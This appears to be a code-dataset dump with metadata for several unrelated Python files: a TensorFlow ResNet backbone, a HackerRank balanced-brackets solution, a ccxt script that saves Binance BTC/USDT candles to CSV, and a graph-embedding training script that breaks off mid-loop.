params = model_params[resnet_depth]
self._resnet_fn = self.resnet_v1_generator(
params['block'], params['layers'])
def __call__(self, inputs, is_training=False):
"""Returns the ResNet model for a given size and number of output classes.
Args:
      inputs: a `Tensor` with shape [batch_size, height, width, 3] representing
a batch of images.
is_training: `bool` if True, the model is in training mode.
Returns:
a `dict` containing `int` keys for continuous feature levels [2, 3, 4, 5].
The values are corresponding feature hierarchy in ResNet with shape
[batch_size, height_l, width_l, num_filters].
"""
with tf.variable_scope('resnet%s' % self._resnet_depth):
return self._resnet_fn(inputs, is_training)
def resnet_v1_generator(self, block_fn, layers):
"""Generator for ResNet v1 models.
Args:
block_fn: `function` for the block to use within the model. Either
`residual_block` or `bottleneck_block`.
layers: list of 4 `int`s denoting the number of blocks to include in each
of the 4 block groups. Each group consists of blocks that take inputs of
the same resolution.
Returns:
Model `function` that takes in `inputs` and `is_training` and returns the
output `Tensor` of the ResNet model.
"""
def model(inputs, is_training=False):
"""Creation of the model graph."""
inputs = nn_ops.conv2d_fixed_padding(
inputs=inputs, filters=64, kernel_size=7, strides=2,
data_format=self._data_format)
inputs = tf.identity(inputs, 'initial_conv')
inputs = self._batch_norm_relu(inputs, is_training=is_training)
inputs = tf.layers.max_pooling2d(
inputs=inputs, pool_size=3, strides=2, padding='SAME',
data_format=self._data_format)
inputs = tf.identity(inputs, 'initial_max_pool')
c2 = block_group(
inputs=inputs,
filters=64,
strides=1,
use_projection=True,
block_fn=block_fn,
block_repeats=layers[0],
batch_norm_relu=self._batch_norm_relu,
dropblock=self._dropblock,
drop_connect_rate=get_drop_connect_rate(
self._init_drop_connect_rate, 2, 5),
name='block_group1',
is_training=is_training)
c3 = block_group(
inputs=c2,
filters=128,
strides=2,
use_projection=True,
block_fn=block_fn,
block_repeats=layers[1],
batch_norm_relu=self._batch_norm_relu,
dropblock=self._dropblock,
drop_connect_rate=get_drop_connect_rate(
self._init_drop_connect_rate, 3, 5),
name='block_group2',
is_training=is_training)
c4 = block_group(
inputs=c3,
filters=256,
strides=2,
use_projection=True,
block_fn=block_fn,
block_repeats=layers[2],
batch_norm_relu=self._batch_norm_relu,
dropblock=self._dropblock,
drop_connect_rate=get_drop_connect_rate(
self._init_drop_connect_rate, 4, 5),
name='block_group3',
is_training=is_training)
c5 = block_group(
inputs=c4,
filters=512,
strides=2,
use_projection=True,
block_fn=block_fn,
block_repeats=layers[3],
batch_norm_relu=self._batch_norm_relu,
dropblock=self._dropblock,
drop_connect_rate=get_drop_connect_rate(
self._init_drop_connect_rate, 5, 5),
name='block_group4',
is_training=is_training)
return {2: c2, 3: c3, 4: c4, 5: c5}
return model
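A minimal sketch of building the backbone and running a batch of images through it (TF1 graph-mode style, matching the module above; batch and image sizes are illustrative, and the module is assumed importable as modeling.architecture.resnet):
import tensorflow.compat.v1 as tf
from modeling.architecture.resnet import Resnet

tf.disable_v2_behavior()  # graph mode, as assumed by the module above
backbone = Resnet(resnet_depth=50)
images = tf.placeholder(tf.float32, shape=[8, 640, 640, 3])
features = backbone(images, is_training=False)
# features maps feature level -> tensor: features[2] has stride 4, ..., features[5] stride 32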
| 37.964567
| 80
| 0.657057
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from six.moves import range
import tensorflow.compat.v1 as tf
from modeling.architecture import nn_blocks
from modeling.architecture import nn_ops
def get_drop_connect_rate(init_rate, block_num, total_blocks):
if init_rate is not None:
return init_rate * float(block_num) / total_blocks
else:
return None
def block_group(inputs,
filters,
strides,
use_projection,
block_fn,
block_repeats,
batch_norm_relu=nn_ops.BatchNormRelu(),
dropblock=nn_ops.Dropblock(),
drop_connect_rate=None,
data_format='channels_last',
name=None,
is_training=False):
inputs = block_fn(
inputs,
filters,
strides,
use_projection=use_projection,
batch_norm_relu=batch_norm_relu,
dropblock=dropblock,
drop_connect_rate=drop_connect_rate,
data_format=data_format,
is_training=is_training)
for _ in range(1, block_repeats):
inputs = block_fn(
inputs,
filters,
1,
use_projection=False,
batch_norm_relu=batch_norm_relu,
dropblock=dropblock,
drop_connect_rate=drop_connect_rate,
data_format=data_format,
is_training=is_training)
return tf.identity(inputs, name)
class Resnet(object):
def __init__(self,
resnet_depth,
dropblock=nn_ops.Dropblock(),
batch_norm_relu=nn_ops.BatchNormRelu(),
init_drop_connect_rate=None,
data_format='channels_last'):
self._resnet_depth = resnet_depth
self._dropblock = dropblock
self._batch_norm_relu = batch_norm_relu
self._init_drop_connect_rate = init_drop_connect_rate
self._data_format = data_format
model_params = {
10: {'block': nn_blocks.residual_block, 'layers': [1, 1, 1, 1]},
18: {'block': nn_blocks.residual_block, 'layers': [2, 2, 2, 2]},
34: {'block': nn_blocks.residual_block, 'layers': [3, 4, 6, 3]},
50: {'block': nn_blocks.bottleneck_block, 'layers': [3, 4, 6, 3]},
101: {'block': nn_blocks.bottleneck_block, 'layers': [3, 4, 23, 3]},
152: {'block': nn_blocks.bottleneck_block, 'layers': [3, 8, 36, 3]},
200: {'block': nn_blocks.bottleneck_block, 'layers': [3, 24, 36, 3]}
}
if resnet_depth not in model_params:
valid_resnet_depths = ', '.join(
[str(depth) for depth in sorted(model_params.keys())])
raise ValueError(
'The resnet_depth should be in [%s]. Not a valid resnet_depth:'%(
valid_resnet_depths), self._resnet_depth)
params = model_params[resnet_depth]
self._resnet_fn = self.resnet_v1_generator(
params['block'], params['layers'])
def __call__(self, inputs, is_training=False):
with tf.variable_scope('resnet%s' % self._resnet_depth):
return self._resnet_fn(inputs, is_training)
def resnet_v1_generator(self, block_fn, layers):
def model(inputs, is_training=False):
inputs = nn_ops.conv2d_fixed_padding(
inputs=inputs, filters=64, kernel_size=7, strides=2,
data_format=self._data_format)
inputs = tf.identity(inputs, 'initial_conv')
inputs = self._batch_norm_relu(inputs, is_training=is_training)
inputs = tf.layers.max_pooling2d(
inputs=inputs, pool_size=3, strides=2, padding='SAME',
data_format=self._data_format)
inputs = tf.identity(inputs, 'initial_max_pool')
c2 = block_group(
inputs=inputs,
filters=64,
strides=1,
use_projection=True,
block_fn=block_fn,
block_repeats=layers[0],
batch_norm_relu=self._batch_norm_relu,
dropblock=self._dropblock,
drop_connect_rate=get_drop_connect_rate(
self._init_drop_connect_rate, 2, 5),
name='block_group1',
is_training=is_training)
c3 = block_group(
inputs=c2,
filters=128,
strides=2,
use_projection=True,
block_fn=block_fn,
block_repeats=layers[1],
batch_norm_relu=self._batch_norm_relu,
dropblock=self._dropblock,
drop_connect_rate=get_drop_connect_rate(
self._init_drop_connect_rate, 3, 5),
name='block_group2',
is_training=is_training)
c4 = block_group(
inputs=c3,
filters=256,
strides=2,
use_projection=True,
block_fn=block_fn,
block_repeats=layers[2],
batch_norm_relu=self._batch_norm_relu,
dropblock=self._dropblock,
drop_connect_rate=get_drop_connect_rate(
self._init_drop_connect_rate, 4, 5),
name='block_group3',
is_training=is_training)
c5 = block_group(
inputs=c4,
filters=512,
strides=2,
use_projection=True,
block_fn=block_fn,
block_repeats=layers[3],
batch_norm_relu=self._batch_norm_relu,
dropblock=self._dropblock,
drop_connect_rate=get_drop_connect_rate(
self._init_drop_connect_rate, 5, 5),
name='block_group4',
is_training=is_training)
return {2: c2, 3: c3, 4: c4, 5: c5}
return model
| true
| true
|
790b0695b94723e79b7c0b1171676002fd6a3093
| 1,310
|
py
|
Python
|
Data Structures/Stack/Balanced Bracket/balanced_bracket.py
|
brianchiang-tw/HackerRank
|
02a30a0033b881206fa15b8d6b4ef99b2dc420c8
|
[
"MIT"
] | 2
|
2020-05-28T07:15:00.000Z
|
2020-07-21T08:34:06.000Z
|
Data Structures/Stack/Balanced Bracket/balanced_bracket.py
|
brianchiang-tw/HackerRank
|
02a30a0033b881206fa15b8d6b4ef99b2dc420c8
|
[
"MIT"
] | null | null | null |
Data Structures/Stack/Balanced Bracket/balanced_bracket.py
|
brianchiang-tw/HackerRank
|
02a30a0033b881206fa15b8d6b4ef99b2dc420c8
|
[
"MIT"
] | null | null | null |
#!/bin/python3
import math
import os
import random
import re
import sys
# Complete the isBalanced function below.
def isBalanced(s):
left_symbol = [ '{', '[', '(']
right_symbol = [ '}', ']', ')']
# fast checking of symbol counting equality
for i in range(3):
left_count = s.count( left_symbol[i] )
right_count = s.count( right_symbol[i] )
if left_count != right_count:
return "NO"
_stack = []
for i in range( len(s) ):
char = s[i]
if char in { '{', '[', '(' } :
# push into stack
_stack.append( char )
        if char in { '}', ']', ')' } :
            # a closing symbol with no pending opener means the string is unbalanced
            if not _stack:
                return "NO"
            # pop from stack and compare with left symbol
            index_of_right = right_symbol.index( char )
            index_of_left = left_symbol.index( _stack.pop(-1) )
            if index_of_left != index_of_right:
                # mismatched pair, e.g. '(' closed by ']'
                return "NO"
if len(_stack) == 0:
return "YES"
else:
return "NO"
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
t = int(input())
for t_itr in range(t):
s = input()
result = isBalanced(s)
fptr.write(result + '\n')
fptr.close()
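A few quick sanity checks for isBalanced, separate from the HackerRank I/O harness above:
assert isBalanced("{[()]}") == "YES"
assert isBalanced("{[(])}") == "NO"   # interleaved pairs
assert isBalanced("][") == "NO"       # closing bracket with nothing open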
| 17.702703
| 63
| 0.499237
|
import math
import os
import random
import re
import sys
def isBalanced(s):
left_symbol = [ '{', '[', '(']
right_symbol = [ '}', ']', ')']
for i in range(3):
left_count = s.count( left_symbol[i] )
right_count = s.count( right_symbol[i] )
if left_count != right_count:
return "NO"
_stack = []
for i in range( len(s) ):
char = s[i]
if char in { '{', '[', '(' } :
_stack.append( char )
        if char in { '}', ']', ')' } :
            if not _stack:
                return "NO"
            index_of_right = right_symbol.index( char )
            index_of_left = left_symbol.index( _stack.pop(-1) )
            if index_of_left != index_of_right:
                return "NO"
if len(_stack) == 0:
return "YES"
else:
return "NO"
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
t = int(input())
for t_itr in range(t):
s = input()
result = isBalanced(s)
fptr.write(result + '\n')
fptr.close()
| true
| true
|
790b06f7d961da5eefda7131950028b89915e567
| 3,008
|
py
|
Python
|
binance-fetch-ohlcv-to-csv.py
|
yinfeng2016/Bitcoin-Trader-RL
|
cd75848fa89f076ee3d91cf2b866b8160a038b30
|
[
"MIT"
] | null | null | null |
binance-fetch-ohlcv-to-csv.py
|
yinfeng2016/Bitcoin-Trader-RL
|
cd75848fa89f076ee3d91cf2b866b8160a038b30
|
[
"MIT"
] | null | null | null |
binance-fetch-ohlcv-to-csv.py
|
yinfeng2016/Bitcoin-Trader-RL
|
cd75848fa89f076ee3d91cf2b866b8160a038b30
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import os
import sys
import csv
# -----------------------------------------------------------------------------
root = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
sys.path.append(root + '/python')
import ccxt # noqa: E402
# -----------------------------------------------------------------------------
def retry_fetch_ohlcv(exchange, max_retries, symbol, timeframe, since, limit):
    # retry the request until it succeeds or max_retries is exceeded
    num_retries = 0
    while True:
        try:
            num_retries += 1
            ohlcv = exchange.fetch_ohlcv(symbol, timeframe, since, limit)
            # print('Fetched', len(ohlcv), symbol, 'candles from', exchange.iso8601(ohlcv[0][0]), 'to', exchange.iso8601(ohlcv[-1][0]))
            return ohlcv
        except Exception:
            if num_retries > max_retries:
                raise  # Exception('Failed to fetch', timeframe, symbol, 'OHLCV in', max_retries, 'attempts')
def scrape_ohlcv(exchange, max_retries, symbol, timeframe, since, limit):
earliest_timestamp = exchange.milliseconds()
timeframe_duration_in_seconds = exchange.parse_timeframe(timeframe)
timeframe_duration_in_ms = timeframe_duration_in_seconds * 1000
timedelta = limit * timeframe_duration_in_ms
all_ohlcv = []
while True:
fetch_since = earliest_timestamp - timedelta
ohlcv = retry_fetch_ohlcv(exchange, max_retries, symbol, timeframe, fetch_since, limit)
# if we have reached the beginning of history
if ohlcv[0][0] >= earliest_timestamp:
break
earliest_timestamp = ohlcv[0][0]
all_ohlcv = ohlcv + all_ohlcv
print(len(all_ohlcv), 'candles in total from', exchange.iso8601(all_ohlcv[0][0]), 'to', exchange.iso8601(all_ohlcv[-1][0]))
# if we have reached the checkpoint
if fetch_since < since:
break
return all_ohlcv
def write_to_csv(filename, data):
with open(filename, mode='w', newline = '') as output_file:
csv_writer = csv.writer(output_file, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
csv_writer.writerows(data)
def scrape_candles_to_csv(filename, exchange_id, max_retries, symbol, timeframe, since, limit):
# instantiate the exchange by id
exchange = getattr(ccxt, exchange_id)({
'enableRateLimit': True, # required by the Manual
})
# convert since from string to milliseconds integer if needed
if isinstance(since, str):
since = exchange.parse8601(since)
# preload all markets from the exchange
exchange.load_markets()
# fetch all candles
ohlcv = scrape_ohlcv(exchange, max_retries, symbol, timeframe, since, limit)
# save them to csv file
write_to_csv(filename, ohlcv)
print('Saved', len(ohlcv), 'candles from', exchange.iso8601(ohlcv[0][0]), 'to', exchange.iso8601(ohlcv[-1][0]), 'to', filename)
# -----------------------------------------------------------------------------
scrape_candles_to_csv('binance_3.csv', 'binance', 3, 'BTC/USDT', '1h', '2019-05-01T00:00:00Z', 100)
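The same helper works for any ccxt exchange and market; for example (parameter values purely illustrative):
# scrape_candles_to_csv('kraken_ethusd_1d.csv', 'kraken', 3, 'ETH/USD', '1d', '2020-01-01T00:00:00Z', 720)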
| 39.578947
| 133
| 0.628657
|
import os
import sys
import csv
root = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
sys.path.append(root + '/python')
import ccxt
def retry_fetch_ohlcv(exchange, max_retries, symbol, timeframe, since, limit):
    num_retries = 0
    while True:
        try:
            num_retries += 1
            ohlcv = exchange.fetch_ohlcv(symbol, timeframe, since, limit)
            return ohlcv
        except Exception:
            if num_retries > max_retries:
                raise
def scrape_ohlcv(exchange, max_retries, symbol, timeframe, since, limit):
earliest_timestamp = exchange.milliseconds()
timeframe_duration_in_seconds = exchange.parse_timeframe(timeframe)
timeframe_duration_in_ms = timeframe_duration_in_seconds * 1000
timedelta = limit * timeframe_duration_in_ms
all_ohlcv = []
while True:
fetch_since = earliest_timestamp - timedelta
ohlcv = retry_fetch_ohlcv(exchange, max_retries, symbol, timeframe, fetch_since, limit)
if ohlcv[0][0] >= earliest_timestamp:
break
earliest_timestamp = ohlcv[0][0]
all_ohlcv = ohlcv + all_ohlcv
print(len(all_ohlcv), 'candles in total from', exchange.iso8601(all_ohlcv[0][0]), 'to', exchange.iso8601(all_ohlcv[-1][0]))
if fetch_since < since:
break
return all_ohlcv
def write_to_csv(filename, data):
with open(filename, mode='w', newline = '') as output_file:
csv_writer = csv.writer(output_file, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
csv_writer.writerows(data)
def scrape_candles_to_csv(filename, exchange_id, max_retries, symbol, timeframe, since, limit):
# instantiate the exchange by id
exchange = getattr(ccxt, exchange_id)({
'enableRateLimit': True, # required by the Manual
})
# convert since from string to milliseconds integer if needed
if isinstance(since, str):
since = exchange.parse8601(since)
# preload all markets from the exchange
exchange.load_markets()
# fetch all candles
ohlcv = scrape_ohlcv(exchange, max_retries, symbol, timeframe, since, limit)
# save them to csv file
write_to_csv(filename, ohlcv)
print('Saved', len(ohlcv), 'candles from', exchange.iso8601(ohlcv[0][0]), 'to', exchange.iso8601(ohlcv[-1][0]), 'to', filename)
# -----------------------------------------------------------------------------
scrape_candles_to_csv('binance_3.csv', 'binance', 3, 'BTC/USDT', '1h', '2019-05-01T00:00:00Z', 100)
| true
| true
|
790b07891b7b81348e644b5d2b4ad376f79cff20
| 21,906
|
py
|
Python
|
local2global_embedding/run.py
|
LJeub/Local2Global_embedding
|
22e1818639043444f97655d944997a171b992745
|
[
"MIT"
] | null | null | null |
local2global_embedding/run.py
|
LJeub/Local2Global_embedding
|
22e1818639043444f97655d944997a171b992745
|
[
"MIT"
] | null | null | null |
local2global_embedding/run.py
|
LJeub/Local2Global_embedding
|
22e1818639043444f97655d944997a171b992745
|
[
"MIT"
] | null | null | null |
"""Training run script"""
import argparse
import json
from pathlib import Path
from bisect import bisect_left
import torch
import torch_geometric as tg
import matplotlib.pyplot as plt
import local2global as l2g
from local2global_embedding.embedding import speye, train, embedding, VGAE_model, VGAE_loss, reconstruction_auc
from local2global_embedding.network import largest_connected_component, TGraph
from local2global_embedding.patches import create_patch_data
from local2global_embedding.clustering import distributed_clustering, fennel_clustering, louvain_clustering, metis_clustering
class ResultsDict:
"""
Class for keeping track of results
"""
@classmethod
def load(cls, filename, replace=False):
"""
restore results from file
Args:
filename: input json file
replace: set the replace attribute
Returns:
populated ResultsDict
"""
self = cls(replace=replace)
with open(filename) as f:
self._data.update(json.load(f))
return self
def save(self, filename):
"""
dump contents to json file
Args:
filename: output file path
"""
with open(filename, 'w') as f:
json.dump(self._data, f)
def __init__(self, replace=False):
"""
initialise empty ResultsDict
Args:
replace: set the replace attribute (default: ``False``)
"""
self._data = {'dims': [], 'auc': [], 'args': []}
self.replace = replace #: if ``True``, updates replace existing data, if ``False``, updates append data
def __getitem__(self, item):
return self._data[item]
def _update_index(self, index, aucs: list, args=None):
"""
update data for a given index
Args:
index: integer index into data lists
aucs: new auc values (should be a list)
args: new args data (optional)
"""
if self.replace:
self['auc'][index] = aucs
self['args'][index] = args
else:
self['auc'][index].extend(aucs)
self['args'][index].extend([args] * len(aucs))
def _insert_index(self, index: int, dim: int, aucs: list, args=None):
"""
insert new data at index
Args:
index: integer index into data lists
dim: data dimension for index
aucs: new auc values
args: new args data (optional)
"""
self['auc'].insert(index, aucs)
self['dims'].insert(index, dim)
self['args'].insert(index, [args] * len(aucs))
def update_dim(self, dim, aucs, args=None):
"""
update data for given dimension
Args:
dim: dimension to update
aucs: new auc values
args: new args data (optional)
if ``self.contains_dim(dim) == True``, behaviour depends on the value of
``self.replace``
"""
index = bisect_left(self['dims'], dim)
if index < len(self['dims']) and self['dims'][index] == dim:
self._update_index(index, aucs, args)
else:
self._insert_index(index, dim, aucs, args)
def max_auc(self, dim=None):
"""
return maximum auc values
Args:
            dim: if ``dim=None``, return list of values for all dimensions, else only return maximum value for ``dim``.
"""
if dim is None:
return [max(aucs) for aucs in self['auc']]
else:
index = bisect_left(self['dims'], dim)
if index < len(self['dims']) and self['dims'][index] == dim:
return max(self['auc'][index])
else:
return 0.
def contains_dim(self, dim):
"""
equivalent to ``dim in self['dims']``
"""
index = bisect_left(self['dims'], dim)
return index < len(self['dims']) and self['dims'][index] == dim
def reduce_to_dims(self, dims):
"""
remove all data for dimensions not in ``dims``
Args:
dims: list of dimensions to keep
"""
index = [i for i, d in enumerate(dims) if self.contains_dim(d)]
for key1 in self._data:
if isinstance(self._data[key1], list):
self._data[key1] = [self[key1][i] for i in index]
return self
def runs(self, dim=None):
"""
return the number of runs
Args:
            dim: if ``dim is None``, return list of number of runs for all dimensions, else return number of
runs for dimension ``dim``.
"""
if dim is None:
return [len(x) for x in self['auc']]
else:
index = bisect_left(self['dims'], dim)
if index < len(self['dims']) and self['dims'][index] == dim:
return len(self['auc'][index])
else:
return 0
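# Illustrative use of ResultsDict, mirroring how it is used further down in run():
#
#     results = ResultsDict(replace=True)
#     results.update_dim(2, [0.91], args={'lr': 0.01})   # record an AUC for dim 2
#     results.max_auc(2)   # -> 0.91
#     results.runs(2)      # -> 1
#     results.save('example_info.json')
#     restored = ResultsDict.load('example_info.json', replace=True)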
_dataloaders = {} #: dataloaders
def dataloader(name):
"""
decorator for registering dataloader functions
Args:
name: data set name
"""
def loader(func):
_dataloaders[name] = func
return func
return loader
@dataloader('Cora')
def _load_cora():
return tg.datasets.Planetoid(name='Cora', root='/tmp/cora')[0]
@dataloader('PubMed')
def _load_pubmed():
return tg.datasets.Planetoid(name='PubMed', root='/tmp/pubmed')[0]
@dataloader('AMZ_computers')
def _load_amazon_computers():
return tg.datasets.Amazon(root='/tmp/amazon', name='Computers')[0]
@dataloader('AMZ_photo')
def _load_amazon_photos():
return tg.datasets.Amazon(root='/tmp/amazon', name='photo')[0]
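# Further datasets can be registered with the same decorator, e.g. (not enabled here):
#
#     @dataloader('CiteSeer')
#     def _load_citeseer():
#         return tg.datasets.Planetoid(name='CiteSeer', root='/tmp/citeseer')[0]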
def load_data(name):
"""
load data set
Args:
name: name of data set (one of {names})
Returns:
largest connected component of data set
"""
data = _dataloaders[name]()
data = largest_connected_component(data=data)
data.num_nodes = data.x.shape[0]
return data
load_data.__doc__ = load_data.__doc__.format(names=list(_dataloaders.keys()))
def prepare_patches(output_folder, **kwargs):
"""
initialise patch data if ``output_folder`` does not exist, else load existing patch data
Args:
output_folder: folder for storing patch data
**kwargs: arguments passed to :py:func:`~local2global_embedding.patches.create_patch_data`
Returns:
patch_data, patch_graph
"""
output_folder = Path(output_folder)
if output_folder.is_dir():
patch_graph = torch.load(output_folder / 'patch_graph.pt')
patch_data = [torch.load(output_folder / f"patch{i}.pt") for i in range(patch_graph.num_nodes)]
else:
patch_data, patch_graph = create_patch_data(**kwargs)
output_folder.mkdir(parents=True)
torch.save(patch_graph, output_folder / 'patch_graph.pt')
for i, data in enumerate(patch_data):
torch.save(data, output_folder / f'patch{i}.pt')
return patch_data, patch_graph
def csvlist(input_type=str):
"""
Create an argparse type that parses comma separated lists of type ``input_type``
Args:
input_type: type of list elements
Returns:
list parser
"""
def make_list(input_str):
return [input_type(s) for s in input_str.split(',')]
make_list.__doc__ = f"""
argparse type that parses comma separated list of type {input_type}
Args:
input_str: string to be parsed
Returns:
list of elements of type {input_type}
"""
return make_list
_parser = argparse.ArgumentParser(description="Run training example.")
_parser.add_argument('--data', default='Cora', choices=_dataloaders.keys(), help='Dataset to load')
_parser.add_argument('--no_features', action='store_true', help='Discard features and use node identity.')
_parser.add_argument('--num_epochs', type=int, default=200, help='Number of training epochs')
_parser.add_argument('--runs', type=int, default=10, help='Number of training runs (keep best result)')
_parser.add_argument('--dims', type=csvlist(int), default=[2], help='Embedding dimensions (comma-separated)')
_parser.add_argument('--hidden_multiplier', type=int, default=2, help='Hidden dim is `hidden_multiplier` * `dim`')
_parser.add_argument('--target_patch_degree', type=float, default=4.0, help='Target patch degree for sparsification.')
_parser.add_argument('--min_overlap', type=int, default=None, help='Minimum target patch overlap (defaults to `max(dims) + 1`)')
_parser.add_argument('--target_overlap', type=int, default=None, help='Target patch overlap (defaults to twice `min_overlap`)')
_parser.add_argument('--gamma', type=float, default=0.0, help="Value of 'gamma' for RMST sparsification.")
_parser.add_argument('--sparsify', default='resistance', help="Sparsification method to use.",
choices={'resistance', 'rmst', 'none'})
_parser.add_argument('--cluster', default='metis', choices={'louvain', 'distributed', 'fennel', 'metis'}, help="Clustering method to use")
_parser.add_argument('--num_clusters', default=10, type=int, help="Target number of clusters for fennel, or metis.")
_parser.add_argument('--beta', default=0.1, type=float, help="Beta value for distributed")
_parser.add_argument('--num_iters', default=None, type=int, help="Maximum iterations for distributed or fennel (default depends on method choice)")
_parser.add_argument('--lr', default=0.01, type=float, help='Learning rate')
_parser.add_argument('--dist', action='store_true', help='use distance decoder instead of inner product decoder')
_parser.add_argument('--output',
default='.',
help='output folder')
_parser.add_argument('--device', default=None, help="Device used for training e.g., 'cpu', 'cuda'")
_parser.add_argument('--plot', action='store_true', help='Plot embedding performance')
_parser.add_argument('--verbose', action='store_true', help='Show progress info')
def run(**kwargs):
"""
Run training example.
By default this function writes results to the current working directory. To override this use the ``output``
keyword argument.
This function reproduces figure 1(a) of [#l2g]_ if called as ``run(dims=[2**i for i in range(1, 8)], plot=True)``.
Keyword Args:
data: Name of data set to load (one of {``'Cora'``, ``'PubMed'``, ``'AMZ_computers'``, ``'AMZ_photo'``}) (default: ``'Cora'``)
no_features: If ``True``, discard features and use node identity. (default: ``False``)
num_epochs: Number of training epochs (default: ``200``)
        runs: Number of training runs (keep best result) (default: ``10``)
dims: list of embedding dimensions (default: ``[2]``)
hidden_multiplier: Hidden dimension is ``hidden_multiplier * dim``
target_patch_degree: Target patch degree for resistance sparsification. (default: ``4``)
min_overlap: Minimum target patch overlap (default: ``max(dims) + 1``)
target_overlap: Target patch overlap (default: ``2 * max(dims)``)
gamma: Value of 'gamma' for RMST sparsification (default: ``0``)
sparsify: Sparsification method to use (one of {``'resistance'``, ``'none'``, ``'rmst'``})
(default: ``'resistance'``)
cluster: Clustering method to use (one of {``'louvain'``, ``'fennel'`` , ``'distributed'``, ``'metis'``})
(default: ``'metis'``)
num_clusters: Target number of clusters for distributed, fennel, or metis.
num_iters: Maximum iterations for distributed or fennel
lr: Learning rate
dist: If ``True``, use distance decoder instead of inner product decoder (default: ``False``)
output: output folder (default: ``'.'``)
device: Device used for training e.g., 'cpu', 'cuda' (defaults to ``'cuda'`` if available else ``'cpu'``)
plot: If ``True``, plot embedding performance (default: ``False``)
verbose: If ``True``, show progress info (default: ``False``)
This function only accepts keyword arguments and is also exposed as a command-line interface.
.. rubric:: References
.. [#l2g] L. G. S. Jeub et al.
“Local2Global: Scaling global representation learning on graphs via local training”.
DLG-KDD’21. 2021. `arXiv:2107.12224 [cs.LG] <https://arxiv.org/abs/2107.12224>`_.
"""
# support calling this as a python function with keyword arguments
args = _parser.parse_args([])
for key, value in kwargs.items():
if key in args:
setattr(args, key, value)
else:
raise TypeError(f'Unknown argument {key}')
output_folder = Path(args.output)
data = load_data(args.data)
neg_edges = tg.utils.negative_sampling(data.edge_index, data.num_nodes)
graph = TGraph(data.edge_index, data.edge_attr)
basename = args.data
dims = args.dims
num_epochs = args.num_epochs
runs = args.runs
min_overlap = args.min_overlap if args.min_overlap is not None else max(dims) + 1
target_overlap = args.target_overlap if args.target_overlap is not None else 2 * max(dims)
if args.no_features:
data.x = None # remove node features (trained with identity)
basename += '_no_features'
if args.dist:
basename += '_dist'
if args.sparsify == 'resistance':
sp_string = f"resistance_deg{args.target_patch_degree}"
elif args.sparsify == 'rmst':
sp_string = f"rmst_gamma{args.gamma}"
elif args.sparsify == 'none':
sp_string = "no_sparsify"
else:
raise RuntimeError(f"Unknown sparsification method '{args.sparsify}'.")
if args.cluster == 'louvain':
cluster_fun = lambda: louvain_clustering(graph)
cluster_string = 'louvain'
elif args.cluster == 'distributed':
cluster_fun = lambda: distributed_clustering(graph, args.beta, rounds=args.num_iters)
cluster_string = f'distributed_beta{args.beta}_it{args.num_iters}'
elif args.cluster == 'fennel':
cluster_fun = lambda: fennel_clustering(graph, num_clusters=args.num_clusters, randomise_order=True,
num_iters=args.num_iters)
cluster_string = f"fennel_n{args.num_clusters}_it{args.num_iters}"
elif args.cluster == 'metis':
cluster_fun = lambda: metis_clustering(graph, num_clusters=args.num_clusters)
cluster_string = f"metis_n{args.num_clusters}"
else:
raise RuntimeError(f"Unknown cluster method '{args.cluster}'.")
cluster_file = output_folder / f"{args.data}_{cluster_string}_clusters.pt"
if cluster_file.is_file():
clusters = torch.load(cluster_file)
else:
clusters = cluster_fun()
torch.save(clusters, cluster_file)
patch_folder = output_folder / f'{args.data}_{cluster_string}_{sp_string}_mo{min_overlap}_to{target_overlap}_patches'
patch_data, patch_graph = prepare_patches(
output_folder=patch_folder,
data=data,
partition_tensor=clusters,
min_overlap=min_overlap,
target_overlap=target_overlap,
sparsify_method=args.sparsify,
gamma=args.gamma,
target_patch_degree=args.target_patch_degree,
verbose=args.verbose)
if args.verbose:
print(f'total edges: {data.num_edges}')
print(f'total patch edges: {sum(c.num_edges for c in patch_data)}')
if args.no_features:
data.x = speye(data.num_nodes) # add identity as node features for training full model
# compute baseline full model if necessary
baseline_file = output_folder / f'{basename}_full_info.json'
training_args = {'lr': args.lr, 'num_epochs': args.num_epochs, 'hidden_multiplier': args.hidden_multiplier}
if baseline_file.is_file():
baseline_data = ResultsDict.load(baseline_file)
else:
baseline_data = ResultsDict()
for d in dims:
r = baseline_data.runs(d)
if r < runs:
if args.verbose:
print(f'training full model for {runs-r} runs and d={d}')
for r_it in range(r, runs):
if args.verbose:
print(f"full model (d={d}) run {r_it + 1} of {runs}")
data = data.to(args.device)
model = train(data,
VGAE_model(d, d * args.hidden_multiplier, data.num_features, dist=args.dist).to(args.device),
loss_fun=VGAE_loss,
num_epochs=num_epochs,
lr=args.lr,
verbose=args.verbose,
)
coords = embedding(model, data)
auc = reconstruction_auc(coords, data, dist=args.dist)
if auc > baseline_data.max_auc(d):
if args.verbose:
print(f"new best (auc={auc})")
torch.save(model.state_dict(), output_folder / f'{basename}_full_d{d}_best_model.pt')
torch.save(coords, output_folder / f'{basename}_full_d{d}_best_coords.pt')
baseline_data.update_dim(d, [auc], training_args)
baseline_data.save(baseline_file)
results_file = patch_folder / f'{basename}_l2g_info.json'
nt_results_file = patch_folder / f'{basename}_nt_info.json'
if results_file.is_file():
results = ResultsDict.load(results_file, replace=True)
else:
results = ResultsDict(replace=True)
if nt_results_file.is_file():
nt_results = ResultsDict.load(nt_results_file, replace=True)
else:
nt_results = ResultsDict(replace=True)
for d in dims:
patch_list = []
update_aligned_embedding = False
for p_ind, patch in enumerate(patch_data):
patch_result_file = patch_folder / f'{basename}_patch{p_ind}_info.json'
if patch_result_file.is_file():
patch_results = ResultsDict.load(patch_result_file)
else:
patch_results = ResultsDict()
coords_file = patch_folder / f'{basename}_patch{p_ind}_d{d}_best_coords.pt'
if coords_file.is_file():
best_coords = torch.load(coords_file)
r = patch_results.runs(d)
if args.no_features:
patch.x = speye(patch.num_nodes)
if r < runs:
if args.verbose:
print(f'training patch{p_ind} for {runs-r} runs and d={d}')
patch = patch.to(args.device)
for r_it in range(r, runs):
if args.verbose:
print(f"patch{p_ind} (d={d}) run {r_it+1} of {runs}")
model = train(patch,
VGAE_model(d, d * args.hidden_multiplier, patch.num_features, dist=args.dist).to(args.device),
loss_fun=VGAE_loss,
num_epochs=num_epochs,
